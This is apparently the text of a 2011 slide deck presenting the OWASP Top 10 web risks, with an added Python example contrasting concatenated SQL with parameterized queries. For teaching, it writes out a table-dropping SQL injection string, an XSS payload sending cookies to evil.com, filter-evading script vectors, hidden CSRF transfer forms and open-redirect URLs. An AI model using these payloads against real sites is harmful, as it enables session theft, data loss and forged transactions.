Per Josefsson OWASP Topp Tio 20110825


OWASP top 10 - Agenda
Background
Risk based
Top 10 items 1 – 6
Live demo
Top 10 items 7 – 10
OWASP resources
OWASP
The OWASP Guide
Threat Agent | Attack Vector | Weakness Prevalence | Weakness Detectability | Technical Impact | Business Impact
             | Easy          | Widespread          | Easy                   | Severe           |
?            | Average       | Common              | Average                | Moderate         | ?
             | Difficult     | Uncommon            | Difficult              | Minor            |
Warning
Risk analysis
Insiders
Architecture
Modular
Clarity
SDLC
Knowledge
Predictability
Top 10 - 2010
1. Injection
2. Cross site scripting (XSS)
3. Broken authentication and session management
4. Insecure direct object reference
5. Cross site request forgery (CSRF)
6. Security misconfiguration
7. Insecure cryptographic storage
8. Failure to restrict URL access
9. Insufficient transport layer protection
10. Unvalidated redirects and forwards
A1 – Injection
[Diagram: Client -> Appl -> DB / Shell / Pgm (CPU), the interpreters an injection can reach]
A1 – Injection
String query = "SELECT * FROM accnts WHERE ID='" + request.getParameter("id") + "'";

Expected input: id="foo"
SELECT * FROM accnts WHERE ID='foo';

Hostile input: id="foo';DROP accnts;--"
SELECT * FROM accnts WHERE ID='foo';DROP accnts;--';
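To make the slide's point concrete, here is an added example (not from the slides) in Python with SQLite: the same string concatenation as the Java line above beside a parameterized query. It assumes a constructed accnts table, writes DROP TABLE because SQLite needs the keyword the slide omits, and uses executescript to stand in for a driver that allows stacked statements.

```python
import sqlite3

# The slide's payload, with TABLE added so SQLite parses the injected statement.
PAYLOAD = "foo';DROP TABLE accnts;--"

def make_db():
    """Constructed in-memory stand-in for the slide's accnts table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE accnts (ID TEXT PRIMARY KEY, owner TEXT)")
    conn.executemany("INSERT INTO accnts VALUES (?, ?)",
                     [("foo", "alice"), ("bar", "bob")])
    conn.commit()
    return conn

def build_query_concat(user_id):
    """Same string building as the slide's Java line: the input is pasted
    straight into the SQL text, so quotes in it become SQL syntax."""
    return "SELECT * FROM accnts WHERE ID='" + user_id + "'"

def lookup_unsafe(conn, user_id):
    """Runs the concatenated text as a script, like a driver that allows
    stacked statements. Whatever the input injected runs with the
    application's database rights; executescript returns no rows."""
    conn.executescript(build_query_concat(user_id))

def lookup_safe(conn, user_id):
    """Parameterized query: the value travels separately from the SQL text
    and is compared as a literal, whatever characters it contains."""
    cur = conn.execute("SELECT ID, owner FROM accnts WHERE ID = ?", (user_id,))
    return cur.fetchall()

def table_exists(conn):
    row = conn.execute("SELECT 1 FROM sqlite_master "
                       "WHERE type='table' AND name='accnts'").fetchone()
    return row is not None

def demo():
    """Returns what each lookup style does with the slide's payload."""
    conn = make_db()
    safe_rows = lookup_safe(conn, PAYLOAD)   # []: no account has that literal ID
    still_there = table_exists(conn)         # True: the parameterized query was harmless
    lookup_unsafe(conn, PAYLOAD)             # the injected DROP TABLE executes
    return safe_rows, still_there, table_exists(conn)

if __name__ == "__main__":
    print(build_query_concat(PAYLOAD))
    print(demo())  # ([], True, False)
```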
A2 - Cross site scripting (XSS)
[Diagram: Browser -> Appl -> DB -> Browser, the path a stored script takes]
A2 - Cross site scripting (XSS)
(String) page += "<input name='cc' type='TEXT' value='" + request.getParameter("CC") + "'>";

CC="123456789"
<input name='cc' value='123456789'>

CC=123456789"><script>window.location=http://evil.com?x=document.cookie</script>
<input name='cc' value='123456789"><script>window.location=http://evil.com?x=document.cookie</script>'>
A2 - Cross site scripting (XSS)
Filtering on the "<" character is not enough; the same character has many encodings:
<
&lt;
%3C
&#000003C;
\x3c
\x3C
\u003c
\u003C
Sample vectors: <img src=http://site.com onmouseover= , <body onload= , <IMG SRC=jAvascript:alert('test2')>
A3 - Broken authentication and session management
Unpredictable passwords, session IDs and security questions
No session IDs or credentials in URLs
Avoid session fixation
Session timeouts and logout buttons
Different session IDs outside and inside TLS
No clear-text passwords
A4 - Insecure direct object references
<SELECT name=period>
<OPTION>2010q1</OPTION>
<OPTION>2011q2</OPTION>
</SELECT>
Offered value: period=2011q2
Tampered value, not in the list: period=2011q3
A5 - Cross-site request forgery (CSRF)
<img src="http://example.com/transferFunds?amount=1500&destinationAccount=attackersAcct#" width="0" height="0" />

<body onload="document.forms[0].submit()">
<form method="POST" action="https://bank.com/fn">
<input type="hidden" name="sp" value="8109"/>
</form>
A6 - Security misconfiguration
Patching
OS
Application
Frameworks / libraries
Disable unnecessary services
Stack traces
Configuration
A7 - Insecure cryptographic storage
Keep track of sensitive data
Passwords one-way hashed and salted
Password/key management
TLS key pass phrase
M2M passwords (obfuscation)
A8 - Failure to restrict URL access
/user/getAccounts
/admin/getAccounts
A9 - Insufficient transport layer protection
Use SSL/TLS
No mixed content
Use secure cookies
Example: Firesheep exploits poor solutions
A10 - Unvalidated redirects and forwards
http://www.vuln.com/redir.asp?=http://www.links.com
http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D (percent-encoded form of www.google.com)
OWASP resources
OWASP Secure Software Contract Annex
OWASP Developer’s Guide
OWASP Enterprise Security API (ESAPI)
OWASP Software Assurance Maturity Model (SAMM)
OWASP WebGoat